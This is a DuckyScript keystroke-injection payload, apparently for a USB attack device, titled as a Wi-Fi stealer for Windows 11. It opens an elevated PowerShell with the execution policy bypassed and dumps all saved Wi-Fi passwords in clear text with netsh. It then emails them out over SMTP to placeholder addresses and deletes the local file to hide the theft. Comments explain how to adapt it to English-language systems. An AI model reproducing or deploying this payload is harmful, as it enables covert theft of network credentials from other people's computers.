REM____________________________________________________________________________________
REM																					   |
REM				SCRIPT STEAL WIFI V2.0 - WINDOWS 11				© lRantor		       |
REM____________________________________________________________________________________|

REM USE: Use this payload on the desktop. For it to work correctly, it must be on a Windows 11 system in Spanish (to make it work on an English system, the $passwordMatch variable must be changed). 
REM      Additionally, you must enter valid sender and recipient email addresses along with the corresponding sender credentials. 
REM      You can use REM to comment out the parts that send the email or even delete the generated .txt file to save it.

WINDOWS r
DELAY 500
REM Open PowerShell as Administrator
STRING powershell -Command "Start-Process powershell -ArgumentList '-NoProfile -ExecutionPolicy Bypass' -Verb RunAs"
ENTER
DELAY 4000
LEFT
ENTER
DELAY 4000
REM Navigate to Desktop
STRING cd "$env:USERPROFILE\Desktop"
ENTER
REM Turn off the Caps Lock if it is ON
STRING if ([console]::capslock -eq $true) {$wsh = new-object -comobject wscript.shell; $wsh.sendkeys('{capslock}')}
ENTER
REM Initialize Profiles Array
STRING $Profiles = @()
ENTER
REM Get Wi-Fi Profiles
STRING $Profiles += (netsh wlan show profiles) | Select-String "\:(.+)$" | ForEach-Object { $_.Matches.Groups[1].Value.Trim() }
ENTER
REM Extract Passwords
STRING $res = $Profiles | ForEach-Object {
ENTER
STRING     $SSID = $_
ENTER
STRING     $profileInfo = netsh wlan show profile name="$SSID" key=clear
ENTER
STRING     $passwordMatch = ($profileInfo | Select-String "Contenido de la clave\W+\:(.+)$").Matches
ENTER
STRING     if ($passwordMatch.Count -gt 0) {
ENTER
STRING         $password = $passwordMatch.Groups[1].Value.Trim()
ENTER
STRING     } else {
ENTER
STRING         $password = "No password set"
ENTER
STRING     }
ENTER
STRING     [PSCustomObject]@{Wireless_Network_Name = $SSID; Password = $password}
ENTER
STRING }
ENTER
REM Save Results
STRING $res | Out-File -FilePath "$env:USERPROFILE\Desktop\wifi_pass.txt" -Encoding ASCII -Width 50
ENTER
REM Send the email with the attachment
STRING Send-MailMessage -To "TO@MAIL.END" -From "FROM@MAIL.END" -Subject "WiFi Passwords" -Body "Here are the saved WiFi passwords." -SmtpServer "smtp.MAIL.com" -Port 587 -UseSsl -Credential (New-Object System.Management.Automation.PSCredential("FROM@MAIL.END", ("PASSWORD (Use an app password for better security)" | ConvertTo-SecureString -AsPlainText -Force))) -Attachments "$env:USERPROFILE\Desktop\wifi_pass.txt"
ENTER
DELAY 500
STRING Remove-Item -Path "$env:USERPROFILE\Desktop\wifi_pass.txt" -Force
ENTER
STRING exit
ENTER
DELAY 500
STRING exit





